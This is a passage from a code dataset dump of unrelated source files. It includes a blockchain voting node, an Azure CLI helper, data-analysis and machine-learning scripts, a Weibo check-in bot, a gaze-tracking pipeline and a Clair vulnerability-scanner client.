Block(aux_index,aux_timestamp,Transaction(aux_transaction[0],aux_transaction[1],aux_transaction[2]).to_dict(),aux_node,aux_prev_hash)\n\t\t\t\t\t\t\t\t\tadd_block(blockchain,aux_block)\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t# Comprobamos que no se ha añadido nada mientras tanto\n\t\t\t\t\t\t\t\tfblockchain = open('blockchain.dat', 'r')\n\t\t\t\t\t\t\t\taux_str = fblockchain.readlines()\n\t\t\t\t\t\t\t\tblockchain_file2 = map(str.strip, aux_str)\n\t\t\t\t\t\t\t\tfblockchain.close()\n\n\t\t\t\t\t\t\t\t# Si no se ha añadido nada mientras tanto, podemos añadir el nuevo bloque a blockchain.dat\n\t\t\t\t\t\t\t\tif blockchain_file == blockchain_file2:\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tactual_block = Block(str(len(blockchain_file)),vote_time,t1,str(id_nodo),blockchain[-1].hash) # Se crea el bloque\n\t\t\t\t\t\t\t\t\tadd_block(blockchain,actual_block)\t# Se añade el bloque a la cadena de bloques\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t# Quitamos el voto de pending\n\t\t\t\t\t\t\t\t\twith open(name_pending, 'r') as fin:\n\t\t\t\t\t\t\t\t\t\tdata = fin.read().splitlines(True)\n\t\t\t\t\t\t\t\t\twith open(name_pending, 'w') as fout:\n\t\t\t\t\t\t\t\t\t\tfout.writelines(data[1:])\n\t\t\t\t\t\t\t\t\tnew_voto = 0\n\t\t\t\t\t\t\t\t\taux_contador += 1\n\t\t\t\t\t\t\t\t\tprint(\"[+] Ha sido incluida en Blockchain\")\n\n\t\t\t\t\t\t\t\t\t# Hacemos conteo de candidatos\n\t\t\t\t\t\t\t\t\tif (t1['recipient_address'] == candidatos[0]):\n\t\t\t\t\t\t\t\t\t\tvotos_candidatos[0] += 1\n\t\t\t\t\t\t\t\t\telif (t1['recipient_address'] == candidatos[1]):\n\t\t\t\t\t\t\t\t\t\tvotos_candidatos[1] += 1\n\t\t\t\t\t\t\t\t\telif (t1['recipient_address'] == candidatos[2]):\n\t\t\t\t\t\t\t\t\t\tvotos_candidatos[2] += 1\n\t\t\t\t\t\t\t\t\telse: # Voto nulo\n\t\t\t\t\t\t\t\t\t\tvotos_nulos +=1\n\t\t\n\t\t\t\t\t\t\t# Desbloqueamos blockchain.dat\n\t\t\t\t\t\t\tfflag = open('flag.dat', 'w')\n\t\t\t\t\t\t\tfflag.write(\"0\")\n\t\t\t\t\t\t\tfflag.close()\n\n\t\t\t\t\telse:\t# Se ha detectado flag == 1.\n\t\t\t\t\t\tprint(\"[+] Blockchain utilizada por otro nodo. No se ha incluído transacción todavía\")\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tprint(\"[!] NO la incluimos en Blockchain\")\n\t\t\t\tprint_aux()\n\t\t\t\ttime.sleep(t_pending)\n\t\telse:\n\t\t\t# Se imprimen los votos a los distintos candidatos.\n\t\t\taux = sp.call('clear',shell=True)\n\t\t\tprint(20*\"=\" + \" [Nodo \" + str(id_nodo) + \"] \"+ 20*\"=\")\n\t\t\tprint(\"Votos Candidato 1: \" + str(votos_candidatos[0]))\n\t\t\tprint(\"Votos Candidato 2: \" + str(votos_candidatos[1]))\n\t\t\tprint(\"Votos Candidato 3: \" + str(votos_candidatos[2]))\n\n\t\t\tprint_aux2()\n\t\t\t\n\t\t\t# Mientras que no haya votos pendientes.\n\t\t\twhile (os.stat(name_pending).st_size == 0):\n\t\t\t\tfor i in [\"No hay votos pendientes [|]. Votos totales: \" + str(aux_contador),\n\t\t\t\t\t \"No hay votos pendientes [/]. Votos totales: \" + str(aux_contador),\n\t\t\t\t\t \"No hay votos pendientes [-]. Votos totales: \" + str(aux_contador),\n\t\t\t\t\t \"No hay votos pendientes [\\\\]. Votos totales: \" + str(aux_contador)]:\n\t\t\t\t\tsys.stdout.write(\"\\r\" + i)\n\t\t\t\t\tsys.stdout.flush()\n\t\t\t\t\ttime.sleep(0.1)\n\t\t\tprint(\"\\n\")\n\texcept KeyboardInterrupt:\n\t\tprint('\\nControl + C pulsado. Adios.')\n\t\tbreak\n\texcept Exception as e:\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tfname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n\t\tprint(exc_type, exc_obj, fname, exc_tb.tb_lineno)\n\t\t#traceback.print_exc()\n\t\tbreak\n","sub_path":"nodo.py","file_name":"nodo.py","file_ext":"py","file_size_in_byte":9873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"197707145","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n# pylint: disable=unused-argument, no-self-use, line-too-long, protected-access, too-few-public-methods\nfrom ._util import import_aaz_by_profile\n\n\n_NetWork = import_aaz_by_profile(\"network\")\n\n\nclass UsagesList(_NetWork.ListUsages):\n def _output(self, *args, **kwargs):\n result = self.deserialize_output(self.ctx.vars.instance.value, client_flatten=True)\n next_link = self.deserialize_output(self.ctx.vars.instance.next_link)\n result = list(result)\n for item in result:\n item['currentValue'] = str(item['currentValue'])\n item['limit'] = str(item['limit'])\n item['localName'] = item['name']['localizedValue']\n return result, next_link\n# endregion\n","sub_path":"src/azure-cli/azure/cli/command_modules/network/azure_stack/profile_2018_03_01_hybrid/operations/locations.py","file_name":"locations.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"47602899","text":"import os\nimport glob\nimport pandas as pd\n\n#a = os.path.join('/Users/I522537/Documents/pluralsight-projects-Python-Baseball-83868ef/', 'games', '*.EVE')\n\n#game_files = glob.glob(os.path.join('/Users/I522537/Documents/pluralsight-projects-Python-Baseball-83868ef/', 'games', '*.EVE'))\ngame_files = glob.glob(os.path.join(os.getcwd(), 'games', '*.EVE'))\ngame_files.sort()\n#print(game_files)\n\ngame_frames = []\nfor game_file in game_files:\n game_frame = pd.read_csv(game_file, names=['type', 'multi2', 'multi3', 'multi4', 'multi5', 'multi6', 'event'])\n game_frames.append(game_frame)\n\ngames = pd.concat(game_frames)\n#games = games[~games.index.duplicated()]\n#print(games.head(100))\n#print(games.shape)\ngames.loc[games['multi5'] == '??', ['multi5']] = ''\n\nidentifiers = games['multi2'].str.extract(r'(.LS(\\d{4})\\d{5})')\n#print(identifiers.head())\n\nidentifiers = identifiers.fillna(method='ffill')\nidentifiers.columns = ['game_id', 'year']\n#print(identifiers.head())\n\ngames = pd.concat([games, identifiers], sort=False, axis=1)\n#print(games.head())\ngames = games.fillna(' ')\n#print(pd.unique(games['type'].values.ravel()))\ngames.loc[:, 'type'] = pd.Categorical(games.loc[:, 'type'])\nprint(games.head())\n","sub_path":"stats/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"519705472","text":"def credit_account(money, period, rate):\n # Формула расчета ежемесячных выплат S = x * p**n * (p-1) / p**n - 1\n money_per_month = money * (rate / 100 + 1) ** period \\\n * (rate / 100) / ((rate / 100 + 1) ** period - 1)\n # Итоговая сумма выплаты по кредиту\n result = round(money_per_month * period)\n return result\n\ndef main():\n rate = 10\n money = 100000\n period = 12\n\n print(\"Параметры счета:\")\n print(\"Сумма кредита:\", money, \"рублей\")\n print(\"Ставка:\", rate, \"%\")\n print(\"Срок выплаты:\", period, \"месяцев\")\n print(\"Итоговая сумма выплаты по кредиту:\", credit_account(money, period, rate), \"рублей\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"503614026","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\nclass Solution(object):\n def maxProduct(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if not nums:\n return 0\n\n if len(nums) == 1 and nums[0] < 0:\n return nums[0]\n\n foo = []\n\n def x(a, b):\n return a * b\n\n def reduce_plus(nums):\n if not nums:\n return 0\n\n return reduce(x, nums)\n\n def bar(nums, foo):\n if not nums:\n return 0\n\n if len(foo) % 2 == 0:\n return reduce_plus(nums)\n\n left = foo[0]\n right = foo[-1]\n\n if left == right or right - left == 1:\n return max(reduce_plus(nums[:left]), reduce_plus(nums[left + 1:]))\n\n mid_mul = reduce_plus(nums[left + 1: right])\n\n left_mul = reduce_plus(nums[:left + 1])\n right_mul = reduce_plus(nums[right:])\n\n if left_mul < right_mul:\n return mid_mul * left_mul\n else:\n return mid_mul * right_mul\n\n for index, num in enumerate(nums):\n if num == 0:\n left = bar(nums[:index], foo)\n return max(left, self.maxProduct(nums[index + 1:]))\n\n if num < 0:\n foo.append(index)\n\n return bar(nums, foo)\n\n\nif __name__ == '__main__':\n s = Solution()\n\n # nums = [2, 3, -2, 4]\n # nums = [-2, 0, -1]\n nums = [-2]\n\n result = s.maxProduct(nums)\n\n print(result)\n","sub_path":"leetcode/152.py","file_name":"152.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"476644314","text":"from libs.Login import *\nfrom libs.path_url_lib import *\nfrom libs.InfoLog import *\n\n\nclass AutoSign(object):\n def __init__(self, driver):\n self.driver = driver\n self.wait = WebDriverWait(self.driver, 30, 0.5) # 等待时间\n self.driver.set_window_size(1000, 820)\n\n def to_page(self, url):\n self.driver.get(url)\n\n def doQuery(self, url):\n self.to_page(url)\n\n if self.driver.current_url != url:\n return False\n\n title = self.wait.until(EC.presence_of_element_located((By.XPATH, title_path))).text\n\n # 在进入李子璇超话页时 检测是否是假登录\n if title == '李子璇':\n # 判断 class name 如果 含有login则返回 problem\n LogInfo(u'INFO:--- 正在判断是否假登录 ---')\n gn_login = self.wait.until(EC.presence_of_element_located((By.XPATH, '//*[@id=\"pl_common_top\"]/div/div'\n '/div[3]/div[2]')))\n classname = gn_login.get_attribute('class')\n if 'login' in classname:\n LogInfo('DEAD THREAD INFO: --!!! 假登录出现 !!!--')\n return 'problem'\n\n focus_btn = self.wait.until(EC.presence_of_element_located((By.XPATH, focus_btn_path)))\n info = focus_btn.text\n\n try:\n self.wait.until(EC.presence_of_element_located((By.XPATH, music_path)))\n except TimeoutException as gt:\n self.driver.refresh()\n self.doQuery(url)\n\n # 如果是已关注,则点击右边的签到按钮:\n if info == 'Y 已关注g':\n try:\n sign_btn = self.driver.find_element_by_xpath(sign_btn_poth)\n if sign_btn.text != '已关注':\n ActionChains(self.driver).move_to_element(sign_btn)\n sign_btn.click()\n time.sleep(3)\n LogInfo('INFO: [{}] 签到完成....'.format(title))\n return True\n\n elif sign_btn.text == '已签到':\n pass\n except NoSuchElementException:\n LogInfo(u'没有找到签到按钮,准备刷新一下...')\n self.driver.refresh()\n self.doQuery(url)\n except StaleElementReferenceException:\n LogInfo(u'没有找到签到按钮,准备刷新一下...')\n self.driver.refresh()\n self.doQuery(url)\n\n # 如果还未关注,则点击关注,再签到\n elif info == '+关注':\n focus_btn.click()\n time.sleep(8)\n try:\n sign_btn = self.wait.until(EC.presence_of_element_located((By.XPATH, sign_btn_poth)))\n sign_btn.click()\n time.sleep(3)\n LogInfo('INFO: [{}] 签到完成....'.format(title))\n\n return True\n except StaleElementReferenceException as s:\n pass\n except TimeoutException as e:\n LogInfo(u'ERROR[处理中]:出现超时...')\n self.driver.refresh()\n sign_btn = self.wait.until(EC.presence_of_element_located((By.XPATH, sign_btn_poth)))\n sign_btn.click()\n except ElementNotVisibleException as w:\n LogInfo(u'ERROR[处理中]:网页元素不可见...')\n self.driver.refresh()\n sign_btn = self.wait.until(EC.presence_of_element_located((By.XPATH, sign_btn_poth)))\n sign_btn.click()\n\n time.sleep(3)\n\n def run(self):\n url_set = [mainst_url, wtd_url, zdz_url, cdb_url, xkl_url, tdy_url, twrj_url, pty_url]\n index = 0\n cnt = 0\n while index <= 7:\n try:\n if cnt <= 3:\n query_ret = self.doQuery(url_set[index])\n if query_ret == 'problem':\n return 'problem', self.driver\n elif query_ret:\n # 如果 ret 是 True\n index += 1\n cnt = 0\n else:\n # 如果失败了,暂时不切下一个超话,继续重新尝试签到\n cnt += 1\n continue\n\n except ElementNotVisibleException as v:\n LogInfo(u'ERROR[处理中]: 尝试点击签到按钮超时,正在刷新重试...')\n cnt += 1\n continue\n except TimeoutException as w:\n LogInfo(u'ERROR[处理中]: 尝试点击签到按钮超时,正在刷新重试...')\n cnt += 1\n continue\n\n return 'peace', self.driver\n","sub_path":"libs/Auto_Sign.py","file_name":"Auto_Sign.py","file_ext":"py","file_size_in_byte":4763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"418613848","text":"import pandas as pd, argparse\nimport matplotlib.pyplot as plt\nimport numpy as np\npsr = argparse.ArgumentParser()\npsr.add_argument('-1', dest=\"ch1\", help=\"input ch1 xlsx file\")\n#psr.add_argument('-2', dest=\"ch2\", help=\"input ch2 xlsx file\")\n#psr.add_argument('-m', dest=\"math\", help=\"input math xlsx file\")\n#psr.add_argument('-o', dest=\"output\", help=\"output txt file\")\nargs = psr.parse_args()\nargs.ch2 = args.ch1 + '_Ch2.csv'\nprefix = args.ch1.split('/')[-1]\ntmpch1 = args.ch1\nargs.math = args.ch1 + '_Math1.csv'\nargs.output = args.ch1 + '_Voltage.png'\nargs.ch1 = args.ch1 + '_Ch1.csv'\n# , skiprows=range(6)\n#ch1 = pd.read_csv(args.ch1, usecols=[3,4], index_col=None, names=['time','voltage'], na_values=['NA'])\nch2 = pd.read_csv(args.ch2, usecols=[3,4], index_col=None, names=['time','voltage'], na_values=['NA'])\nmath = pd.read_csv(args.math, usecols=[3,4], index_col=None, names=['time','voltage'], na_values=['NA'])\nchLength = ch2.shape[0]\nnoisemean = ch2['voltage'][:1500].mean()\nnoisestd = ch2['voltage'][:1500].std()\nch2['volNoNoise'] = ch2['voltage']-noisemean\nprint('noise mean:{};noise std:{}'.format(noisemean, noisestd))\nch2['sumvol']=ch2['volNoNoise'].cumsum()\n\nfig, ax = plt.subplots()\n#ax.plot(ch1['time'], ch1['sumvol'], label='ch1')\nax.plot(ch2['time'], ch2['voltage'], label='ch2')\nax.plot(math['time'], math['voltage'], label='math')\nax.set_title('{} voltage'.format(prefix))\nax.legend()\nfig.savefig(args.output)\nplt.close()\n\nfig, ax = plt.subplots()\n# time interval 1e-10,f interval 1e10/5000\nax.plot(np.arange(chLength)/500, np.abs(np.fft.fft(ch2['sumvol'])), label='ch2 fft')\nax.set_xlabel('f/GHz')\nax2 = ax.twiny()\ncolor = 'tab:red'\nax2.set_xlabel('f/GHz', color=color)\nax2.plot(np.arange(500)/500, np.abs(np.fft.fft(ch2['sumvol'])[0:500]), label='ch1 fft 0-1GHz', color=color)\nax2.tick_params(axis='x', labelcolor=color)\nax2.legend(loc=9)\nax.set_title('{} fft frequency'.format(prefix))\nax.legend()\nfig.savefig(tmpch1+'_fft.png')\nplt.close()\n#print(ch)","sub_path":"ginter.py","file_name":"ginter.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"202180525","text":"import argparse\nimport cv2\nimport logging\nfrom input_feeder import InputFeeder\nfrom mouse_controller import MouseController\nfrom face_detection import Face_Detection\nfrom head_pose_estimation import Head_Pose_Estimation\nfrom facial_landmarks_detection import Facial_Landmarks_Detection\nfrom gaze_estimation import Gaze_Estimation\nfrom debug_utils import draw_axes, draw_gaze_vector\n\n\ndef get_args():\n '''\n Gets the arguments from the command line.\n '''\n parser = argparse.ArgumentParser(\"Run inference on an input video\")\n # -- Create the descriptions for the commands\n device = \"The device name, if not 'CPU'\"\n extension = \"CPU extension if any\"\n file = \"Input file\"\n setDebug = \"set debug\"\n\n\n # -- Add required and optional groups\n parser._action_groups.pop()\n required = parser.add_argument_group('required arguments')\n optional = parser.add_argument_group('optional arguments')\n\n # -- Create the arguments\n optional.add_argument(\"-i\", help=file, default='../bin/demo.mp4')\n optional.add_argument(\"-d\", help=device, default='CPU')\n optional.add_argument(\"-e\", help=extension)\n optional.add_argument(\"-s\", help=setDebug, default=0)\n args = parser.parse_args()\n\n return args\n\ndef get_face_coordinates(image, width, height):\n processed_image = fd_model.preprocess_input(image)\n fdm_out = fd_model.predict(processed_image)\n fdm_preprocessed_out = fd_model.preprocess_output(fdm_out, height, width)\n\n if(len(fdm_preprocessed_out) > 0):\n return fdm_preprocessed_out[0]\n else:\n None\n\ndef get_head_pose_estimate(cropped_face):\n hpe_preprocessed_in = hpe_model.preprocess_input(cropped_face)\n hpe_out = hpe_model.predict(hpe_preprocessed_in)\n return hpe_model.preprocess_output(hpe_out)\n\ndef get_facial_land_marks(cropped_face, width, height):\n fld_preprocessed_in = fld_model.preprocess_input(cropped_face)\n fld_out = fld_model.predict(fld_preprocessed_in)\n return fld_model.preprocess_output(fld_out, width, height)\n\ndef extract_eyes(land_marks, face, offset):\n left_eye_min = (int(land_marks[0]) - offset, int(land_marks[1]) - offset)\n left_eye_max = (int(land_marks[0]) + offset, int(land_marks[1]) + offset)\n\n right_eye_min = (int(land_marks[2]) - offset, int(land_marks[3]) - offset)\n right_eye_max = (int(land_marks[2]) + offset, int(land_marks[3]) + offset)\n\n\n left_eye = face[left_eye_min[1]: left_eye_max[1], left_eye_min[0]: left_eye_max[0]]\n right_eye = face[right_eye_min[1]: right_eye_max[1], right_eye_min[0]: right_eye_max[0]]\n\n return left_eye, right_eye\n\ndef get_gaze_vector(left_eye, right_eye, yaw_pitch_roll):\n ge_preproccessed_in = ge_model.preprocess_input(left_eye, right_eye, yaw_pitch_roll)\n ge_out = ge_model.predict(ge_preproccessed_in)\n ge_preprocessed_out = ge_model.preprocess_output(ge_out)\n return ge_preprocessed_out[:2]\n\ndef track_gaze(input, debug):\n\n if input == 'CAM':\n feed = InputFeeder(input_type='cam')\n else:\n feed=InputFeeder(input_type='video', input_file=input)\n feed.load_data()\n (width, height) = feed.dimensions()\n fps = feed.fps()\n logging.info('Video stream info: width: {}, height: {}, fps: {}'.format(width, height, fps))\n\n mouse_controller = MouseController('low', 'fast')\n \n if(debug):\n CODEC = cv2.VideoWriter_fourcc(*'DIVX')\n out = cv2.VideoWriter('debug_out.avi', CODEC, fps, (width,height))\n\n for batch in feed.next_batch():\n if(batch is None):\n logging.info('Video stream completed.')\n break\n \n face_coordinates = get_face_coordinates(batch, width, height)\n\n if(face_coordinates != None):\n (x_min,y_min), (x_max, y_max) = face_coordinates\n cropped_face = batch[y_min:y_max, x_min: x_max]\n\n (yaw, pitch, roll) = get_head_pose_estimate(cropped_face)\n\n fld_preprocessed_out = get_facial_land_marks(cropped_face, (x_max - x_min), (y_max - y_min))\n\n off_set = 30\n left_eye, right_eye = extract_eyes(fld_preprocessed_out, cropped_face, off_set)\n\n if(debug):\n center_of_face = (x_min + cropped_face.shape[1]/2, y_min + cropped_face.shape[0]/2, 0)\n batch = draw_axes(batch, center_of_face, yaw, pitch, roll, 50, 950)\n\n expected_shape = (off_set * 2, off_set * 2, 3)\n if(left_eye.shape == expected_shape and right_eye.shape == expected_shape):\n\n x, y = get_gaze_vector(left_eye, right_eye, (yaw, pitch, roll))\n\n if(not(debug)):\n mouse_controller.move(x, y)\n\n if(debug):\n batch = draw_gaze_vector(fld_preprocessed_out, (x_min, y_min), (x,y), batch)\n\n if(debug):\n out.write(batch)\n\n feed.close()\n if(debug):\n out.release()\n\nfd_model = None\nhpe_model = None \nfld_model = None\nge_model = None\n\ndef main():\n args = get_args()\n device = args.d\n extension = args.e\n\n global fd_model\n global hpe_model\n global fld_model\n global ge_model\n\n face_detection_model = '../models/intel/face-detection-adas-0001/FP16/face-detection-adas-0001.xml'\n fd_model = Face_Detection(model_name=face_detection_model, device = device, extensions=extension)\n fd_model.load_model()\n\n head_pose_estimation_model = '../models/intel/head-pose-estimation-adas-0001/FP16/head-pose-estimation-adas-0001.xml'\n hpe_model = Head_Pose_Estimation(model_name=head_pose_estimation_model, device=device, extensions=extension)\n hpe_model.load_model()\n\n facial_landmark_detection_model = '../models/intel/landmarks-regression-retail-0009/FP16/landmarks-regression-retail-0009.xml'\n fld_model = Facial_Landmarks_Detection(model_name=facial_landmark_detection_model, device=device, extensions=extension)\n fld_model.load_model()\n\n gaze_estimation_model = '../models/intel/gaze-estimation-adas-0002/FP16/gaze-estimation-adas-0002.xml'\n ge_model = Gaze_Estimation(model_name=gaze_estimation_model, device=device, extensions=extension)\n ge_model.load_model()\n\n logging.basicConfig(filename='debug.log', level=logging.DEBUG)\n logging.info('Arguments: device: {}, extension: {}, file: {}, setDebug:{}'.format(device, extension, args.i, args.s))\n\n setDebug = False\n if(args.s == '1'):\n setDebug = True\n\n track_gaze(args.i, setDebug)\n\n\nif __name__ == \"__main__\":\n main()\n ","sub_path":"src/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":6434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"445853434","text":"\"\"\" from https://github.com/keithito/tacotron \"\"\"\n\nimport re\nfrom unidecode import unidecode\nfrom phonemizer import phonemize\nfrom .symbols import symbols_set\nfrom .numbers import normalize_numbers\n\n_whitespace_re = re.compile(r'\\s+')\n\n_abbreviations = [(re.compile('\\\\b%s\\\\.' % x[0], re.IGNORECASE), x[1]) for x in [\n ('mrs', 'misess'),\n ('mr', 'mister'),\n ('dr', 'doctor'),\n ('st', 'saint'),\n ('co', 'company'),\n ('jr', 'junior'),\n ('maj', 'major'),\n ('gen', 'general'),\n ('drs', 'doctors'),\n ('rev', 'reverend'),\n ('lt', 'lieutenant'),\n ('hon', 'honorable'),\n ('sgt', 'sergeant'),\n ('capt', 'captain'),\n ('esq', 'esquire'),\n ('ltd', 'limited'),\n ('col', 'colonel'),\n ('ft', 'fort'),\n]]\n\n\ndef expand_abbreviations(text):\n for regex, replacement in _abbreviations:\n text = re.sub(regex, replacement, text)\n return text\n\n\ndef expand_numbers(text):\n return normalize_numbers(text)\n\n\ndef lowercase(text):\n return text.lower()\n\n\ndef collapse_whitespace(text):\n return re.sub(_whitespace_re, ' ', text)\n\n\ndef to_phonemes(text: str, lang: str) -> str:\n phonemes = phonemize(text,\n language=lang,\n backend='espeak',\n strip=True,\n preserve_punctuation=True,\n with_stress=True,\n njobs=2,\n punctuation_marks=';:,.!?¡¿—…\"«»“”()',\n language_switch='remove-flags')\n phonemes = ''.join([p for p in phonemes if p in symbols_set])\n return phonemes\n\n\ndef convert_to_ascii(text):\n return unidecode(text)\n\n\ndef basic_cleaners(text):\n text = lowercase(text)\n text = collapse_whitespace(text)\n phonemes = to_phonemes(text, \"vi\")\n return phonemes\n\n\ndef transliteration_cleaners(text):\n text = convert_to_ascii(text)\n text = lowercase(text)\n text = collapse_whitespace(text)\n return text\n\n\ndef english_cleaners(text):\n text = convert_to_ascii(text)\n text = lowercase(text)\n text = expand_numbers(text)\n text = expand_abbreviations(text)\n text = collapse_whitespace(text)\n return text\n","sub_path":"Grad-TTS/text/cleaners.py","file_name":"cleaners.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"18881330","text":"import inline as inline\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\nfrom matplotlib import style\r\nstyle.use('seaborn')\r\n\r\ndata=pd.read_csv(r'C:\\Users\\Sargis\\AppData\\Local\\Programs\\Python\\Python38-32\\kc_house_data.csv',encoding='latin')\r\nprint(data.T)\r\nprint(data['price'].describe())\r\nres=len(data[data['price']>7e5])/len(data)\r\nprint(res)\r\nprint(data.shape)\r\n\r\n\r\n# data['price'].plot(kind='hist',bins=60)\r\n# plt.show()\r\nprint(data.info())\r\npd.set_option('display.max_colwidth', -1)\r\npd.read_csv(r'C:\\Users\\Sargis\\AppData\\Local\\Programs\\Python\\Python38-32\\kc_house_data.csv',\r\n delimiter=';',\r\n encoding='latin')\r\nprint(data.T)\r\n# data.zipcode.value_counts().plot(kind='bar')\r\n# plt.show()\r\n\r\nuniq=data[['bedrooms',\r\n 'bathrooms',\r\n 'floors',\r\n 'view',\r\n 'condition',\r\n 'grade',\r\n 'yr_built',\r\n 'yr_renovated',\r\n ]].apply(lambda x: x.nunique(), axis=0)\r\n# print(uniq)\r\n\r\ndata = data.drop(['id', 'zipcode', 'date', 'sqft_basement'], axis=1, inplace=False)\r\nprint(data.shape)\r\n\r\n\r\nprint(sum(data.price>=7e5))\r\nprint(sum(data.price>=7e5)/data.shape[0])\r\ndata['high_price']=(data.price>7e5).astype('int64')\r\ndata.drop(['price'], axis=1, inplace=True)\r\nprint(len(data))\r\nprint(data.high_price.value_counts())\r\n\r\n\r\nfrom sklearn import preprocessing\r\nprint(data.mean(axis=0).round(3))\r\nprint(data.std(axis=0).round(3))\r\ndata.iloc[:,:-1]= preprocessing.scale(data.iloc[:,:-1])\r\nprint(data.mean(axis=0).round(3))\r\nprint(data.std(axis=0).round(3))\r\nprint(data.T)\r\n\r\nX,y = data.loc[:,data.columns != 'high_price'], data.loc[:,'high_price']\r\n\r\nfrom sklearn.metrics import accuracy_score,recall_score,precision_score,confusion_matrix,f1_score\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = train_test_split(X,y,test_size = 0.20,random_state = 42)\r\n\r\n\r\nfrom sklearn.tree import DecisionTreeClassifier\r\ndt= DecisionTreeClassifier()\r\ndt.fit(x_train,y_train)\r\ny_pred=dt.predict(x_test)\r\nDecisionTree_score=dt.score(x_test,y_test)\r\nprint(\"Accuracy of decision tree:\",dt.score(x_test,y_test))\r\nprint(precision_score(y_pred,y_test))\r\nprint(recall_score(y_pred,y_test))\r\n\r\n\r\nfrom sklearn.model_selection import train_test_split\r\ntrain_data,test_data,train_y,test_y=train_test_split(data.drop('high_price', axis=1),\r\n data['high_price'],\r\n test_size=0.2,\r\n random_state=15)\r\n\r\n\r\nprint(train_y.value_counts(normalize=True))\r\nprint(test_y.value_counts(normalize=True))\r\n\r\n\r\nimport sys\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn import metrics\r\nfrom sklearn.metrics import confusion_matrix,roc_auc_score\r\n\r\n\r\ndTree = DecisionTreeClassifier()\r\nprint(dTree.fit(train_data,train_y))\r\npred=dTree.predict(test_data)\r\nprint(pred)\r\n\r\nprint(metrics.classification_report(test_y,pred))\r\n\r\nfrom sklearn.metrics import roc_curve, auc,f1_score\r\nfpr, tpr, _ = roc_curve(test_y, pred)\r\nroc_auc = auc(fpr, tpr)\r\nplt.plot(fpr, tpr, color='darkorange',)\r\nplt.plot(np.linspace(0,1,20),np.linspace(0,1,20), '-.')\r\nplt.xlabel('False Positive Rate')\r\nplt.ylabel('True Positive Rate')\r\nplt.title('Receiver operating characteristic (ROC)')\r\nprint('ROC curve (area = %0.2f)' % roc_auc)\r\nplt.show()\r\n\r\n\r\n","sub_path":"ClassificationKNN/ClassificationDecisionTree.py","file_name":"ClassificationDecisionTree.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"460256164","text":"# -*- coding: utf-8 -*-\n\nfrom paclair.api.abstract_clair_requests import AbstractClairRequests\nfrom paclair.exceptions import PaclairException\n\n\nclass ClairRequestsV3(AbstractClairRequests):\n \"\"\"\n Request Clair helper\n \"\"\"\n\n _CLAIR_ANALYZE_URI = \"/ancestry/{}?with_vulnerabilities=1&with_features=1\"\n _CLAIR_POST_URI = \"/ancestry\"\n #_CLAIR_DELETE_URI = \"/v1/ancestry/{}\"\n\n def post_ancestry(self, ancestry):\n \"\"\"\n Post ancestry to Clair\n\n :param ancestry: ancestry to push\n \"\"\"\n json = ancestry.to_json()\n json['ancestry_name'] = ancestry.name.replace(':', '_')\n return self._request('POST', self._CLAIR_POST_URI, json=json)\n\n def get_ancestry(self, ancestry, statistics=False):\n \"\"\"\n Analyse an ancestry\n\n :param ancestry: ancestry (name) to analyse\n :param statistics: only return statistics\n :return: json\n \"\"\"\n response = self._request('GET', self._CLAIR_ANALYZE_URI.format(ancestry.replace(':', '_')))\n if statistics:\n return self.statistics(response.json())\n return response.json()\n\n def delete_ancestry(self, ancestry):\n \"\"\"\n Delete ancestry from Clair\n\n :param ancestry: ancestry to delete\n \"\"\"\n raise PaclairException(\"Delete is not available for V3 api\")\n\n @staticmethod\n def statistics(clair_json):\n \"\"\"\n Statistics from a json delivered by Clair\n\n :param clair_json: json delivered by Clair\n \"\"\"\n result = {}\n for feature in clair_json.get('ancestry', {}).get('features', []):\n for vuln in feature.get(\"vulnerabilities\", []):\n if \"fixedBy\" in vuln:\n result[vuln[\"severity\"]] = result.setdefault(vuln[\"severity\"], 0) + 1\n return result","sub_path":"paclair/api/clair_requests_v3.py","file_name":"clair_requests_v3.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"117653803","text":"from keras.models import Sequential\nfrom keras.layers import Embedding, Flatten, Dense\nimport keras\nimport matplotlib.pyplot as plt\n\nimport DataPretreat\n\nif __name__ == \"__main__\":\n \"\"\"\n 解析IMDB文件数据\n \"\"\"\n 